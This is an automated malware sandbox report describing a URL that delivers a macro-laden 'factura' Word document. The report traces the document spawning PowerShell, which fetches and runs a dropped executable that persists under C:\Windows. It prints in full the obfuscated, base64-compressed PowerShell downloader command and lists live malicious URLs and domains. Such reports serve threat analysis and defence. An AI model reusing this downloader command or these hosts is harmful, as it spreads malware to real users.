ID: Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version:

Similar documents
ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 12:58:02 Date: 02/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:10:41 Date: 01/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:46:38 Date: 29/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 17:39:02 Date: 22/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 11:59:06 Date: 14/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:27:59 Date: 16/03/2018 Version:

ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version:

ID: Cookbook: browseurl.jbs Time: 15:48:15 Date: 29/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:46:19 Date: 09/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version:

ID: Sample Name: FsQHOWXph8.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 20:31:13 Date: 16/03/2018 Version:

ID: Cookbook: urldownload.jbs Time: 20:09:25 Date: 13/06/2018 Version:

ID: Sample Name: MobaXterm_installer.dat Cookbook: default.jbs Time: 18:29:43 Date: 25/05/2018 Version:

ID: Cookbook: urldownload.jbs Time: 16:41:45 Date: 23/06/2018 Version:

ID: Sample Name: js.jar Cookbook: defaultwindowsfilecookbook.jbs Time: 10:01:15 Date: 26/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version:

ID: Sample Name: test.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 18:57:54 Date: 12/04/2018 Version:

ID: Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version:

ID: Cookbook: urldownload.jbs Time: 19:58:34 Date: 02/05/2018 Version:

ID: Sample Name: image002 Cookbook: default.jbs Time: 18:19:28 Date: 18/05/2018 Version:

ID: Cookbook: urldownload.jbs Time: 19:53:36 Date: 07/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version:

ID: Cookbook: urldownload.jbs Time: 22:46:20 Date: 19/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 08:25:02 Date: 29/10/2018 Version: Fire Opal

ID: Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 09:43:59 Date: 21/10/2017 Version:

ID: Sample Name: FD-1 Phase Out Notice.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:36:29 Date: 04/05/2018 Version: 22.0.

ID: Cookbook: urldownload.jbs Time: 20:31:22 Date: 09/08/2018 Version:

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version:

ID: Sample Name: maintools.js Cookbook: default.jbs Time: 15:43:35 Date: 17/02/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version:

ID: Sample Name: test.txt Cookbook: default.jbs Time: 13:18:36 Date: 31/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version:

ID: Sample Name: tesseract-ocrsetup exe. Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 18:48:38 Date: 19/06/2018 Version:

ID: Sample Name: MSM- 24_Supply_List RU_518.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 17:15:48 Date: 19/06/2018 Version: 22.0.

ID: Sample Name: fly.jse Cookbook: default.jbs Time: 18:17:26 Date: 11/11/2017 Version:

ID: Sample Name: quzpecasrh Cookbook: default.jbs Time: 16:55:54 Date: 07/10/2017 Version:

ID: Cookbook: browseurl.jbs Time: 18:05:31 Date: 26/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 22:26:00 Date: 30/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 02:55:04 Date: 01/02/2018 Version:

ID: Sample Name: Serial.txt Cookbook: default.jbs Time: 02:59:20 Date: 07/05/2018 Version:

ID: Sample Name: SSI Set Details.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 01:14:07 Date: 13/04/2018 Version: 22.0.

ID: Sample Name: Luxus.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 10:22:08 Date: 09/01/2018 Version:

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version:

ID: Sample Name: testfiletestfile.txt Cookbook: default.jbs Time: 15:24:30 Date: 06/07/2018 Version:

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.

ID: Sample Name: TO_HM_CROWN PR#U0130NCE MOHAMMED B#U0130N SALMAN - Dear Prime Minister.doc Cookbook: defaultwindowsofficecookbook.

ID: Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date:

ID: Sample Name: text_0.txt Cookbook: default.jbs Time: 16:20:15 Date: 12/01/2018 Version:

ID: Sample Name: Payment_Remittance#.xps Cookbook: defaultwindowsofficecookbook.jbs Time: 01:35:46 Date: 20/09/2018 Version: 23.0.

ID: Cookbook: browseurl.jbs Time: 14:02:12 Date: 23/11/2018 Version: Fire Opal

ID: Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version:

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0.

ID: Sample Name: E DA5e8a0c01b.txt Cookbook: default.jbs Time: 15:35:01 Date: 18/04/2018 Version:

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 19:21:50 Date: 15/10/2017 Version:

ID: Sample Name: MacKeeper.dmg Cookbook: default.jbs Time: 11:09:32 Date: 02/06/2018 Version:

ID: Sample Name: FORMP16T.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 09:39:29 Date: 28/05/2018 Version:

ID: Sample Name: NEW ORDER LIST.jar Cookbook: default.jbs Time: 10:19:47 Date: 19/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 20:47:24 Date: 09/12/2017 Version:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date:

ID: Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version:

ID: Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:54 Date: 07/06/2018 Version:

ID: Sample Name: test Cookbook: default.jbs Time: 09:46:13 Date: 21/05/2018 Version:

ID: Sample Name: Coss, Daniel.vcf Cookbook: default.jbs Time: 15:16:47 Date: 21/06/2018 Version:

ID: Sample Name: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751.evaljs.js Cookbook: default.jbs Time: 16:44:00 Date:

ID: Sample Name: 11#Ucb#Uae#Uc4#Ube#Ue5#Ubb#UaafNOnOJTVYQ.exe Cookbook: default.jbs Time: 09:47:21 Date: 02/02/2018 Version: 20.0.

ID: Sample Name: Swift details.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 17:14:48 Date: 21/06/2018 Version: 22.0.

ID: Sample Name: promo_50_ iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 21:28:55 Date: 28/06/2018 Version:

ID: Sample Name: 5GeZNwROcB.bin Cookbook: default.jbs Time: 15:22:54 Date: 30/11/2017 Version:

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version:

ID: Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24:33 Date: 15/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version:

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.

ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:47:53 Date: 16/02/2018 Version:

ID: Sample Name: paint.net install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version:

ID: Sample Name: gpg4win exe.sig Cookbook: default.jbs Time: 21:44:31 Date: 02/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 16:10:39 Date: 07/12/2017 Version:

ID: Cookbook: browseurl.jbs Time: 18:10:52 Date: 18/05/2018 Version:

ID: Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:54:49 Date: 26/01/2018 Version:

ID: Sample Name: oq5wdjgk2r.exe Cookbook: default.jbs Time: 20:25:47 Date: 22/11/2017 Version:

ID: Sample Name: PO xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03:13:36 Date: 08/01/2018 Version:

ID: Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version:

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date:

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version:

ID: Sample Name: Unconfirmed crdownload Cookbook: default.jbs Time: 22:58:07 Date: 08/11/2017 Version:

Transcription:

ID: 67658 Cookbook: browseurl.jbs Time: 20:07:02 Date: 11/07/2018 Version: 23.0.0

Table of Contents Analysis Report Overview Information Detection Confidence Classification Analysis Advice Signature Overview AV Detection: Software Vulnerabilities: Networking: Persistence and Installation Behavior: Data Obfuscation: Spreading: System Summary: HIPS / PFW / Operating System Protection Evasion: Anti Debugging: Malware Analysis System Evasion: Hooking and other Techniques for Hiding and Protection: Language, Device and Operating System Detection: Behavior Graph Simulations Behavior and APIs Antivirus Detection Initial Sample Dropped Files Unpacked PE Files Domains URLs Yara Overview Initial Sample PCAP (Network Traffic) Dropped Files Memory Dumps Unpacked PEs Joe Sandbox View / Context IPs Domains ASN Dropped Files Screenshots Startup Created / dropped Files Contacted Domains/Contacted IPs Contacted Domains Contacted URLs Contacted IPs Public Static File Info No static file info Network Behavior Network Port Distribution Table of Contents Copyright Joe Security LLC 2018 Page 2 of 32 2 4 4 4 4 4 5 5 6 6 6 6 6 6 6 7 7 7 7 7 7 8 8 8 8 8 8 9 9 9 9 9 9 9 9 9 9 9 9 9 10 10 10 11 14 14 14 14 15 15 15 15 15

TCP Packets UDP Packets DNS Queries DNS Answers HTTP Request Dependency Graph HTTP Packets Code Manipulations Statistics Behavior System Behavior Analysis Process: iexplore.exe PID: 3684 Parent PID: 548 File Activities Registry Activities Analysis Process: iexplore.exe PID: 3740 Parent PID: 3684 File Activities Registry Activities Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 3684 File Activities File Created File Read Registry Activities Key Created Analysis Process: powershell.exe PID: 2200 Parent PID: 2364 File Activities File Created File Written File Read Registry Activities Analysis Process: OSPPSVC.EXE PID: 2380 Parent PID: 424 Analysis Process: 375.exe PID: 2868 Parent PID: 2200 Analysis Process: 375.exe PID: 2852 Parent PID: 2868 Analysis Process: montanacim.exe PID: 2500 Parent PID: 424 Analysis Process: montanacim.exe PID: 2532 Parent PID: 2500 Disassembly 16 23 23 23 23 24 25 25 25 25 25 25 26 26 26 26 26 27 27 27 27 27 27 27 27 28 28 28 28 28 29 30 30 30 31 31 31 31 31 31 31 31 32 Copyright Joe Security LLC 2018 Page 3 of 32

Analysis Report Overview Information Joe Sandbox Version: 23.0.0 Analysis ID: 67658 Start time: 20:07:02 Joe Sandbox Product: CloudBasic Start date: 11.07.2018 Overall analysis duration: Hypervisor based Inspection enabled: Report type: Cookbook file name: Sample URL: 0h 2m 19s light browseurl.jbs http://www.shopsforclothes.uk/factura-adjunto/ Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Number of analysed new started processes analysed: 12 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies Analysis stop reason: Detection: Classification: Cookbook Comments: Warnings: Timeout MAL EGA enabled mal100.evad.expl.win@15/14@2/3 Adjust boot time Correcting counters for adjusted boot time Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Detection Strategy Score Range Reporting Detection Threshold 100 0-100 Report FP / FN Confidence Strategy Score Range Further Analysis Required? Confidence Copyright Joe Security LLC 2018 Page 4 of 32

Strategy Score Range Further Analysis Required? Threshold 5 0-5 Confidence Classification Ransomware Miner Spreading malicious malicious malicious Evader Phishing suspicious suspicious suspicious clean clean clean Exploiter Banker Spyware Trojan / Bot Adware Analysis Advice Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis Copyright Joe Security LLC 2018 Page 5 of 32

Signature Overview AV Detection Networking Spreading Software Vulnerabilities Persistence and Installation Behavior Data Obfuscation System Summary HIPS / PFW / Operating System Protection Evasion Anti Debugging Malware Analysis System Evasion Hooking and other Techniques for Hiding and Protection Language, Device and Operating System Detection Click to jump to signature section AV Detection: Antivirus detection for dropped file Multi AV Scanner detection for dropped file Software Vulnerabilities: Document exploit detected (process start blacklist hit) Potential browser exploit detected (process start blacklist hit) Networking: HTTP GET or POST without a user agent Downloads files Downloads files from webservers via HTTP Performs DNS lookups Uses HTTPS Persistence and Installation Behavior: Drops executables to the windows directory (C:\Windows) and starts them Drops PE files Drops PE files to the windows directory (C:\Windows) Data Obfuscation: Binary contains a suspicious time stamp Document contains an embedded VBA with many randomly named variables Suspicious powershell command line found Binary may include packed or encrypted code Spreading: Creates COM task schedule object (often to register a task for autostart) Enumerates the file system Copyright Joe Security LLC 2018 Page 6 of 32

System Summary: Document contains an embedded VBA macro which executes code when the document is opened / closed Document contains an embedded VBA macro which may execute processes Powershell connects to network Powershell drops PE file Creates mutexes Reads the hosts file PE file has an executable.text section which is very likely to contain packed code (zlib compression ratio < 0.3) Classification label Creates files inside the user directory Creates temporary files Parts of this applications are using the.net runtime (Probably coded in C#) Reads ini files Reads software policies Spawns processes Uses an in-process (OLE) Automation server Found GUI installer (many successful clicks) Found graphical window changes (likely an installer) Uses Microsoft Silverlight Checks if Microsoft Office is installed Uses new MSVCR Dlls Binary contains paths to debug symbols HIPS / PFW / Operating System Protection Evasion: Very long cmdline option found, this is very uncommon (may be encrypted or packed) Anti Debugging: Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) Checks if the current process is being debugged Enables debug privileges Creates guard pages, often used to prevent reverse engineering and debugging Malware Analysis System Evasion: Checks the free space of harddrives Contains long sleeps (>= 3 min) Enumerates the file system May sleep (evasive loops) to hinder dynamic analysis Queries disk information (often used to detect virtual machines) Queries a list of all running processes Hooking and other Techniques for Hiding and Protection: System process connects to network (likely due to code injection or exploit) Starts Microsoft Word (often done to prevent that the user detects that something wrong) Stores large binary data to the registry Disables application error messsages (SetErrorMode) Language, Device and Operating System Detection: Queries the installation date of Windows Queries the volume information (name, serial number etc) of a device Copyright Joe Security LLC 2018 Page 7 of 32

Queries the cryptographic machine GUID Behavior Graph Behavior Graph Hide Legend ID: 67658 URL: http://www.shopsforclothes.uk/factura-adjunto/ Startdate: 11/07/2018 Legend: Architecture: WINDOWS Score: 100 Process Antivirus detection for dropped file Suspicious powershell command line found Document contains an embedded VBA with many randomly named variables 3 other signatures started started started Signature Created File iexplore.exe montanacim.exe OSPPSVC.EXE DNS/IP Info dropped 7 37 Is Dropped Factura-jul-734_77...ial:Zone.Identifier, ASCII Is Windows Process Potential browser exploit detected (process start blacklist hit) started started Drops executables to the windows directory (C:\Windows) and starts them started Number of created Registry Values Number of created Files WINWORD.EXE iexplore.exe montanacim.exe Visual Basic 49 21 10 Delphi www.shopsforclothes.uk www.gezginyerler.com 2 other IPs or domains dropped started C:\Users\...\Factura-jul-734_7793344[1].doc, 77139Yc4581 177.240.22.159, 443 dropped MegaCableSAdeCVMX Mexico Factura-jul-734_77...doc.kusto82.partial, 77139Yc4581 Java.Net C# or VB.NET C, C++ or other language Suspicious powershell command line found Document exploit detected (process start blacklist hit) Is malicious powershell.exe 12 7 gezginyerler.com 94.73.145.234, 49172, 80 dropped CIZGITR Turkey C:\Users\user\AppData\Local\Temp\375.exe, PE32 started System process connects to network (likely due to code injection or exploit) Powershell connects to network Powershell drops PE file 375.exe Multi AV Scanner detection for dropped file started 375.exe Simulations Behavior and APIs Time Type Description 20:07:28 API Interceptor 354x Sleep call for process: iexplore.exe modified 20:07:42 API Interceptor 5x Sleep call for process: WINWORD.EXE modified 20:07:46 API Interceptor 3x Sleep call for process: OSPPSVC.EXE modified 20:07:46 API Interceptor 1x Sleep call for process: powershell.exe modified 20:07:51 API Interceptor 2x Sleep call for process: 375.exe modified 20:07:53 API Interceptor 2x Sleep call for process: montanacim.exe modified Antivirus Detection Initial Sample Detection Scanner Label Link http://www.shopsforclothes.uk/factura-adjunto/ 6% virustotal Browse Dropped Files Copyright Joe Security LLC 2018 Page 8 of 32

Detection Scanner Label Link C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59K Z\Factura-jul-734_7793344[1].doc C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59K Z\Factura-jul-734_7793344.doc.kusto82.partial 100% Avira HEUR/Macro.Downloader. AMAK.Gen 100% Avira HEUR/Macro.Downloader. AMAK.Gen C:\Users\user\AppData\Local\Temp\375.exe 24% virustotal Browse Unpacked PE Files No Antivirus matches Domains Detection Scanner Label Link shopsforclothes.uk 0% virustotal Browse gezginyerler.com 0% virustotal Browse www.shopsforclothes.uk 6% virustotal Browse www.gezginyerler.com 4% virustotal Browse URLs Detection Scanner Label Link http://www.gezginyerler.com/jposeirt/sk4npm/ 6% virustotal Browse http://www.shopsforclothes.uk/factura-adjunto/ 6% virustotal Browse Yara Overview Initial Sample No yara matches PCAP (Network Traffic) No yara matches Dropped Files No yara matches Memory Dumps No yara matches Unpacked PEs No yara matches Joe Sandbox View / Context IPs No context Domains No context ASN Copyright Joe Security LLC 2018 Page 9 of 32

No context Dropped Files No context Screenshots Startup Copyright Joe Security LLC 2018 Page 10 of 32

System is w7 iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: CA1F703CD665867E8132D2946FB55750) iexplore.exe (PID: 3740 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2 MD5: CA1F703CD665867E8132D2946FB55750) WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet File s\content.ie5\e2pg59kz\factura-jul-734_7793344.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D) powershell.exe (PID: 2200 cmdline: powershell. ( $verbosepreference.tostring()[1,3]+'x'-join'') (new-object SYStEM.IO.cOMprESsiOn.DEFLATesTreaM( [SySteM.i o.memorystream] [system.convert]::frombase64string( 'VZBha8IwEIb/Sj8UojibDzodloIw2cYUkcmQwWCk561JTZOaRGMV//tqJ2N+O+59eI57ww8zSxT6rk5zBBfM0UU rtb+lqoxiemptqrhz5yhs732u4tetqkij0usgc5qx2qiwjtppf74o6pgf3e93aezhftxe4rh3v4i9ml6bdr5knpu9qkgkvmutgt5nrqgwkz6/sqixitmyaly0mfagd2u0v DKV7VhWT6gyKSyn3BXy6y9/fp0Nt4fpQ6+68VmOQjKDbJ2jR1k/VjXewftAFENKomUphWuRMWnH4Sp/C5KA9Ib3JA7zjU9CVPuRw6LskE/SueQdEuEBSfytayfwVggvPhA quhtzpjltnck682iiff0swz8jiq1zf1ye7xjpmhhdhdga1ja7ok1nm/gmzae/nc8/' ), [Io.comPrEssIoN.cOMpREsSIONmoDe]::DEcomPreSs ) foreach-object{new-object SysTEm.IO.StreamREAder( $_,[Text.enCoding]::aScIi ) } FOReACh-OBjEct{ $_.ReadToeND( ) } ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA) 375.exe (PID: 2868 cmdline: 'C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe' MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) 375.exe (PID: 2852 cmdline: C:\Users\SAMTAR~1\AppData\Local\Temp\375.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) OSPPSVC.EXE (PID: 2380 cmdline: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE MD5: 358A9CCA612C68EB2F07DDAD4CE1D8D7) montanacim.exe (PID: 2500 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) cleanup montanacim.exe (PID: 2532 cmdline: C:\Windows\system32\montanacim.exe MD5: 5CFD7D5DDCE93878D78F788EE599CD4D) Created / dropped Files C:\Users\SAMTAR~1\AppData\Local\Temp\~DF39AECE6F2D8D91FE.TMP Process: C:\Program Files\Internet Explorer\iexplore.exe File Type: FoxPro FPT, blocks size 258, next free block index 16711424 Size (bytes): 29989 Entropy (8bit): 1.5864525822286235 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 51465E7C75B403C0F8EBA0DFCE495D07 EC3BC8C6C3E33438286676C47693CEFD117CDD70 A20AF7F3839991E1F9DC4C6584F3051E5D12E484E2163A65FEFA2F59111370C4 CD861803E56627E7AB6DC5FDCD240C610CBA046BB576149CFACC19C98E8F3DFB80A79426F86EA4ABE5C2AD693 492DF884E188E4A1A2170B251017F4E2860E4EB C:\Users\SAMTAR~1\AppData\Local\Temp\~DFF15FB7F7397518C0.TMP Process: C:\Program Files\Internet Explorer\iexplore.exe File Type: FoxPro FPT, blocks size 258, next free block index 16711424 Size (bytes): 12981 Entropy (8bit): 0.5702287585746456 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 31C6E06C0ED0F3BC1EB446C3C385F86C 7DFF1019DEB1E24703CC1381877538DC4EF8481F 0C12D66E4CBF06172D80B1AA461089937377F93DA8123C738C24E568544759EA 741165926C26B067F22237D646885292AD0F1BF38B7B4A4C58E723851CA5B700F1B6D1584A4DF633282CA52314AD D965546E7A8C4F532274799F7F10A841195F C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{453915F1-8535-11E8-B3E3-CCDA62336E41}.dat Process: File Type: Size (bytes): 32344 C:\Program Files\Internet Explorer\iexplore.exe Microsoft Word Document Entropy (8bit): 1.7961453136900805 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 0840666E2F4353DD26ACEF205F93DF0C 96433B9A50F40B33177EDBFD532FE09AFEAA2A5F 23695026E676D896E4036A2B5BA34518079E615D157A97387CB07A2988313172 CAEAD80BFF7BA74A598725A20D45B47BADE2D056991D62D21A23A29090C59D5281DA8F79DE0A0AED6B3C73E05 F78DB902B356D9FFB650039E83B63114F6E9B8A C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{453915F3-8535-11E8-B3E3-CCDA62336E41}.dat Process: C:\Program Files\Internet Explorer\iexplore.exe File Type: Microsoft Word Document Size (bytes): 19032 Copyright Joe Security LLC 2018 Page 11 of 32

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{453915F3-8535-11E8-B3E3-CCDA62336E41}.dat Entropy (8bit): 1.5994134081644797 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 52EFE6F720C9479DEA26CEA2F175BD45 5408956966DD7CB2257A1F82A64BC2446E6439A8 F725A88BD294BFBF20F4BB804C3A872CF23F067C04C56E493EB369EE6B413055 6D628192D388A9C4933A82644ADD81C5ED51E3F8DF3B12233EF05C62942A662F4DF0446DAD8B9DD134B8DC296C 08847E915B7A2AF907D44D74973D95C7584B96 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344.doc.kusto82.partial Process: File Type: C:\Program Files\Internet Explorer\iexplore.exe 77139Yc4581 Size (bytes): 273408 Entropy (8bit): 6.944111945665807 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Antivirus: 0631F95C9F57F5095D250E84BB817E03 2333A2EB7BCFB2BF489E2CB421173CF85BEF5A92 1891D61D7065AF231EFB4CBB473355DD4E838C5F0605AD261392C4061CDCA4D4 89868EBAE21F36D2BCE0EF24F631392FB9C3A067934F2D8660927810238A8F2615E86D7E9A35BDE15E587F89EFC 5B8C1A6A979E26981ECCAFB05C87CE8293B60 true Antivirus: Avira, Detection: 100%, Browse C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344.doc.kusto82.partial:Zone.Identifier Process: File Type: Size (bytes): 26 C:\Program Files\Internet Explorer\iexplore.exe ASCII text, with CRLF line terminators Entropy (8bit): 3.9500637564362093 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: FBCCF14D504B7B2DBCB5A5BDA75BD93B D59FC84CDD5217C6CF74785703655F78DA6B582B EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913 AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E 3973DDEFC68966F974E124307B5043E654443B98 true C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344.doc:Zone.Identifier Process: File Type: Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: C:\Program Files\Internet Explorer\iexplore.exe very short file (no magic) ECCBC87E4B5CE2FE28308FD9F2A7BAF3 77DE68DAECD823BABBB58EDB1C8E14D7106E83BB 4E07408562BEDB8B60CE05C1DECFE3AD16B72230967DE01F640B7E4729B49FCE 3BAFBF08882A2D10133093A1B8433F50563B93C14ACD05B79028EB1D12799027241450980651994501423A66C276A E26C43B739BC65C4E16B10C3AF6C202AEBB C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344[1].doc Process: File Type: C:\Program Files\Internet Explorer\iexplore.exe 77139Yc4581 Size (bytes): 273408 Entropy (8bit): 6.944111945665807 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 0631F95C9F57F5095D250E84BB817E03 2333A2EB7BCFB2BF489E2CB421173CF85BEF5A92 1891D61D7065AF231EFB4CBB473355DD4E838C5F0605AD261392C4061CDCA4D4 89868EBAE21F36D2BCE0EF24F631392FB9C3A067934F2D8660927810238A8F2615E86D7E9A35BDE15E587F89EFC 5B8C1A6A979E26981ECCAFB05C87CE8293B60 true Copyright Joe Security LLC 2018 Page 12 of 32

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\Factura-jul-734_7793344[1].doc Antivirus: Antivirus: Avira, Detection: 100%, Browse C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A42F0F-085E-4C91-AAFF-15F0360F0BDE}.tmp Process: File Type: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE data Size (bytes): 1536 Entropy (8bit): 1.394399881272213 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 86244F16D770E95ECD1FCE98D25CCA90 C88E6E54E4ED808BC9DD655C07E9DC61F7D27A62 D0411AA97C881545363C8C9984D5D00D0217E0879ED11A70A5B63A2212565071 39E0C4A9A82728D483661B9287229EE644533CD7B19D7638A23947CC02A73EEC7E0D8FFE22682FCD415CF05BD6 FB360D4CD33E9FCBE6A048DAD0CBF886179E21 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C0B3E1FE-FA90-46FB-A94C-79F14B48BEF0}.tmp Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375" Size (bytes): 1024 Entropy (8bit): 0.05390218305374581 Encrypted: 